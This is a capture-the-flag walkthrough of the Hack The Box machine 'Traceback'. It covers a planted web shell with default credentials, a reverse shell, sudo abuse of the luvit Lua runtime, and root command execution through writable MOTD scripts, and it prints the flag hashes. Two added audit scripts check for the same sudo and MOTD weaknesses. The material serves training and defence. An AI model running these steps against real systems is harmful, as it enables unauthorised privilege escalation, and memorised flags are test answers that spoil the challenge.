Traceback

TL;DR

  • Find the web shell on the website (smevk.php) and the credentials to log in
  • Use Lua to own the sysadmin user.
  • Get root.txt through the banners executed as root (MOTD)

User.txt

Reconnaissance

Let’s start with an Nmap scan:

magnussen@funcMyLife:~/traceback$ nmap -sS -sV -sC -p- -vvv --min-rate 5000 --reason -oN traceback.txt 10.10.10.181
# Nmap 7.60 scan initiated Fri Apr  3 18:06:02 2020 as: nmap -sS -sV -sC -p- -vvv --min-rate 5000 --reason -oN traceback.txt 10.10.10.181
Increasing send delay for 10.10.10.181 from 0 to 5 due to 135 out of 448 dropped probes since last increase.
Warning: 10.10.10.181 giving up on port because retransmission cap hit (10).
Increasing send delay for 10.10.10.181 from 640 to 1000 due to 190 out of 633 dropped probes since last increase.
Nmap scan report for traceback.htb (10.10.10.181)
Host is up, received echo-reply ttl 63 (0.13s latency).
Scanned at 2020-04-03 18:06:02 CEST for 137s
Not shown: 52600 closed ports, 12933 filtered ports
Reason: 52600 resets and 12933 no-responses
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDbMNfxYPZGAdOf2OAbwXhXDi43/QOeh5OwK7Me/l15Bej9yfkZwuLhyslDCYIvi4fh/2ZxB0MecNYHM+Sf4xR/CqPgIjQ+NuyAPI/c9iXDDhzJ+HShRR5WIqsqBHwtsQFrcQXcfQFYlC+NFj5ro9wfl2+UvDO6srTUxl+GaaabePYm2u0mlmfwHqlaQaB8HOUb436IdavyTdvpW7LTz4qKASrCTPaawigDymMEQTRYXY4vSemIGMD1JbfpErh0mrFt0Hu12dmL6LrqNmUcbakxOXvZATisHU5TloxqH/p2iWJSwFi/g0YyR2JZnIB65fGTLjIhZsOohtSG7vrPk+cZ
|   256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBD2jCEklOC94CKIBj9Lguh3lmTWDFYq41QkI5AtFSx7x+8uOCGaFTqTwphwmfkwZTHL1pzOMoJTrGAN8T7LA2j0=
|   256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (EdDSA)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIL4LOW9SgPQeTZubVmd+RsoO3fhSjRSWjps7UtHOc10p
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_  Supported Methods: OPTIONS HEAD GET POST
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Help us
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Apr  3 18:08:19 2020 -- 1 IP address (1 host up) scanned in 137.40 seconds

So we find 2 useful services on 2 ports:

  • SSH (22)
  • Apache (80)

Let’s check the web server:

Owned

So it seems the website has already been compromised and the attacker has left a backdoor. We also find the following message in the HTML: “Some of the best web shells that you might need ;)”.

OSINT

The attacker has left us two clues: his name and the fact that the web shell might be popular.

With Google we quickly find the attacker’s GitHub account and, in particular, a repository described with the sentence “Some of the best web shells that you might need”: https://github.com/Xh4H/Web-Shells

If we look for the PHP files from that repository on the website, we find smevk.php.

Login webshell

We can login with admin:admin.

Webshell

Get a proper shell

This part will be useful later, but getting SSH access is so much more pleasant than using the web shell that I did it as soon as I had a shell.

I started by uploading a reverse shell, the Pentest Monkey one, like everybody on the box it seems…

Then I added my SSH public key to /home/webadmin/.ssh/authorized_keys to get an SSH session.

magnussen@funcMyLife:~/traceback$ nc -lvp 7777
Listening on [0.0.0.0] (family 0, port 7777)
Connection from traceback.htb 50818 received!
Linux traceback 4.15.0-58-generic #64-Ubuntu SMP Tue Aug 6 11:12:41 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
 10:52:39 up 1 min,  0 users,  load average: 0.10, 0.05, 0.02
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=1000(webadmin) gid=1000(webadmin) groups=1000(webadmin),24(cdrom),30(dip),46(plugdev),111(lpadmin),112(sambashare)
/bin/sh: 0: can't access tty; job control turned off
$ cd /home/webadmin/.ssh
$ echo 'ssh-rsa AAAA... magnussen@funcMyLife' >> authorized_keys

Finally, I just had to connect with ssh:

magnussen@funcMyLife:~/traceback$ ssh webadmin@traceback.htb
#################################
-------- OWNED BY XH4H  ---------
- I guess stuff could have been configured better ^^ -
#################################

Welcome to Xh4H land



Last login: Thu Feb 27 06:29:02 2020 from 10.10.14.3
webadmin@traceback:~$

Admin Access

Now that we have a shell on the box, we can start to enumerate:

webadmin@traceback:~$ ll
total 44
drwxr-x--- 5 webadmin sysadmin 4096 Mar 16 04:03 ./
drwxr-xr-x 4 root     root     4096 Aug 25  2019 ../
-rw------- 1 webadmin webadmin  105 Mar 16 04:03 .bash_history
-rw-r--r-- 1 webadmin webadmin  220 Aug 23  2019 .bash_logout
-rw-r--r-- 1 webadmin webadmin 3771 Aug 23  2019 .bashrc
drwx------ 2 webadmin webadmin 4096 Aug 23  2019 .cache/
drwxrwxr-x 3 webadmin webadmin 4096 Aug 24  2019 .local/
-rw-rw-r-- 1 webadmin webadmin    1 Aug 25  2019 .luvit_history
-rw-r--r-- 1 webadmin webadmin  807 Aug 23  2019 .profile
drwxrwxr-x 2 webadmin webadmin 4096 Feb 27 06:29 .ssh/
-rw-rw-r-- 1 sysadmin sysadmin  122 Mar 16 03:53 note.txt
webadmin@traceback:~$ cat note.txt
- sysadmin -
I have left a tool to practice Lua.
I'm sure you know where to find it.
Contact me if you have any question.
webadmin@traceback:~$ sudo -l
Matching Defaults entries for webadmin on traceback:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User webadmin may run the following commands on traceback:
    (sysadmin) NOPASSWD: /home/sysadmin/luvit

We can run /home/sysadmin/luvit as sysadmin. According to note.txt, it is a tool to execute Lua.

Lua is a scripting language, and luvit is a runtime for it.

A quick visit to GTFOBins shows us that we can abuse Lua to get a shell as sysadmin.

webadmin@traceback:~$ sudo -u sysadmin /home/sysadmin/luvit  -e 'os.execute("/bin/sh")'
$ /bin/bash
sysadmin@traceback:~$ cd /home/sysadmin
sysadmin@traceback:/home/sysadmin$ ll
total 4336
drwxr-x--- 5 sysadmin sysadmin    4096 Mar 16 03:53 ./
drwxr-xr-x 4 root     root        4096 Aug 25  2019 ../
-rw------- 1 sysadmin sysadmin       1 Aug 25  2019 .bash_history
-rw-r--r-- 1 sysadmin sysadmin     220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 sysadmin sysadmin    3771 Apr  4  2018 .bashrc
drwx------ 2 sysadmin sysadmin    4096 Aug 25  2019 .cache/
drwxrwxr-x 3 sysadmin sysadmin    4096 Aug 24  2019 .local/
-rw-r--r-- 1 sysadmin sysadmin     807 Apr  4  2018 .profile
drwxr-xr-x 2 root     root        4096 Aug 25  2019 .ssh/
-rwxrwxr-x 1 sysadmin sysadmin 4397566 Aug 24  2019 luvit*
-rw------- 1 sysadmin sysadmin      33 Apr  3 15:23 user.txt
sysadmin@traceback:/home/sysadmin$ cat user.txt
d67827ba52f906a8df540376334d69e
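A defender-side check for the sudo rule exploited above, added here as an example that is not part of the original writeup: a POSIX shell audit that reads sudoers-format text and flags NOPASSWD rules granting an interpreter or runtime such as luvit, since such a rule is equivalent to granting a shell as the runas user. The sudoers sample inside is constructed (only the webadmin rule mirrors the box), and the interpreter list is an assumption you can extend.

```shell
#!/bin/sh
# Audit sudoers text for NOPASSWD rules that hand out an interpreter or
# runtime: such a rule is effectively a shell as the runas user, which is
# exactly what the luvit rule on the box gives webadmin.

# Basenames that evaluate arbitrary code from "-e" or a script argument (assumed list).
INTERPRETERS='lua|luvit|luajit|python[0-9.]*|perl|ruby|node|php|sh|bash|dash|zsh'

# Read sudoers-format text on stdin; print "<user> -> (<runas>) <command>"
# for every NOPASSWD command whose basename matches INTERPRETERS.
risky_nopasswd_rules() {
    sed 's/#.*//' | grep 'NOPASSWD' | while IFS= read -r line; do
        user=$(printf '%s\n' "$line" | awk '{print $1}')
        runas=$(printf '%s\n' "$line" | sed -n 's/.*(\([^)]*\)).*/\1/p')
        # The part after "NOPASSWD:" may list several comma-separated commands.
        cmds=$(printf '%s\n' "$line" | sed 's/.*NOPASSWD:[[:space:]]*//')
        printf '%s\n' "$cmds" | tr ',' '\n' | while IFS= read -r cmd; do
            cmd=$(printf '%s\n' "$cmd" | sed 's/^[[:space:]]*//;s/[[:space:]]*$//')
            [ -n "$cmd" ] || continue
            bin=$(basename "${cmd%% *}")
            if printf '%s\n' "$bin" | grep -Eq "^($INTERPRETERS)$"; then
                printf '%s -> (%s) %s\n' "$user" "$runas" "$cmd"
            fi
        done
    done
}

# Constructed sample (not the real sudoers from the box): the writeup's rule
# plus a mixed backup rule and a benign service-restart rule.
SAMPLE_SUDOERS='webadmin ALL=(sysadmin) NOPASSWD: /home/sysadmin/luvit
backup   ALL=(root) NOPASSWD: /usr/bin/rsync, /usr/bin/python3 /opt/backup.py
deploy   ALL=(root) /usr/bin/systemctl restart app'

# Run the audit over the sample; on a real host pipe in /etc/sudoers and
# /etc/sudoers.d/* instead (reading them needs root).
risky_in_sample() {
    printf '%s\n' "$SAMPLE_SUDOERS" | risky_nopasswd_rules
}

risky_in_sample
```

The python3 rule is flagged too: even with a fixed script argument, the rule is only as safe as the script file's permissions.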

I AM ROOT

Motd

Now that we have the user.txt, it’s time to get the root.txt.

After some enumeration on the server, we find the following running process:

root       2265  0.0  0.0   4628   828 ?        Ss   15:46   0:00 /bin/sh -c sleep 30 ; /bin/cp /var/backups/.update-motd.d/* /etc/update-motd.d/

If we check the /etc/update-motd.d directory, we see that it is writable by our user (through the sysadmin group), and as we saw previously, these banner scripts are handled and run as root.

sysadmin@traceback:/home/sysadmin$ ll /etc/update-motd.d/
total 32
drwxr-xr-x  2 root sysadmin 4096 Aug 27  2019 ./
drwxr-xr-x 80 root root     4096 Mar 16 03:55 ../
-rwxrwxr-x  1 root sysadmin  981 Apr  3 15:54 00-header*
-rwxrwxr-x  1 root sysadmin  982 Apr  3 15:54 10-help-text*
-rwxrwxr-x  1 root sysadmin 4264 Apr  3 15:54 50-motd-news*
-rwxrwxr-x  1 root sysadmin  604 Apr  3 15:54 80-esm*
-rwxrwxr-x  1 root sysadmin  299 Apr  3 15:54 91-release-upgrade*

So we can execute commands as root by injecting a command into one of these banners; we just have to connect through SSH to display the banner and execute the command we want. But we have to be fast, as this directory is overwritten from the backup copy every 30 seconds. We can print /root/root.txt when we log in with SSH.

I must admit I was lazy on this one and just printed /root/root.txt; we could also have set up a reverse shell in one of these banners if we wanted a proper shell.

sysadmin@traceback:/etc/update-motd.d$ echo 'cat /root/root.txt' >> /etc/update-motd.d/00-header

And in another terminal we log in with SSH and retrieve root.txt:

magnussen@funcMyLife:~/traceback$ ssh webadmin@traceback.htb
#################################
-------- OWNED BY XH4H  ---------
- I guess stuff could have been configured better ^^ -
#################################

Welcome to Xh4H land

a10bbfef22291efa1edcbdce5ef9846a


Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Fri Apr  3 16:09:49 2020 from 10.10.14.166
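A defender-side check for the MOTD misconfiguration exploited above, added here as an example that is not part of the original writeup: a POSIX shell audit that flags update-motd.d scripts writable by a non-root group or not owned by root (root:sysadmin with mode 775 in the listing above), with the stock-permission remediation. The demo directory it builds is constructed, not the box.

```shell
#!/bin/sh
# Audit an update-motd.d directory for the weakness on the box: scripts that
# pam_motd runs as root at every SSH login, yet writable by a non-root group
# (root:sysadmin, mode 775 in the listing above).

# Print every regular file under $1 that is group- or world-writable.
writable_motd_scripts() {
    find "$1" -type f \( -perm -g=w -o -perm -o=w \) | sort
}

# Print every regular file under $1 that is not owned by root.
non_root_motd_scripts() {
    find "$1" -type f ! -user root | sort
}

# Report findings; return 0 when the directory is clean, 1 otherwise.
audit_motd_dir() {
    dir=${1:-/etc/update-motd.d}
    rc=0
    for f in $(writable_motd_scripts "$dir"); do
        echo "group/world-writable root-executed script: $f"; rc=1
    done
    for f in $(non_root_motd_scripts "$dir"); do
        echo "not owned by root: $f"; rc=1
    done
    [ "$rc" -eq 0 ] && echo "$dir: ok"
    return "$rc"
}

# Remediation matching a stock Ubuntu install: root-owned, mode 755 (needs root).
harden_motd_dir() {
    dir=${1:-/etc/update-motd.d}
    chown -R root:root "$dir" && chmod 755 "$dir" "$dir"/*
}

# Constructed demo directory (not the real box): one stock-mode banner script
# and one with the 775 mode from the writeup.
demo_motd_dir() {
    d=$(mktemp -d)
    printf '#!/bin/sh\necho "Welcome"\n' > "$d/00-header"
    printf '#!/bin/sh\necho "Help"\n' > "$d/10-help-text"
    chmod 755 "$d/00-header"
    chmod 775 "$d/10-help-text"
    echo "$d"
}

demo=$(demo_motd_dir)
audit_motd_dir "$demo"; rm -rf "$demo"
```

Run it as root against the real directory after the box's restore job has fired, since that job copies the 775 files back every 30 seconds.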

This was a nice box, not very difficult but a lot of fun! Thanks Xh4h for the box!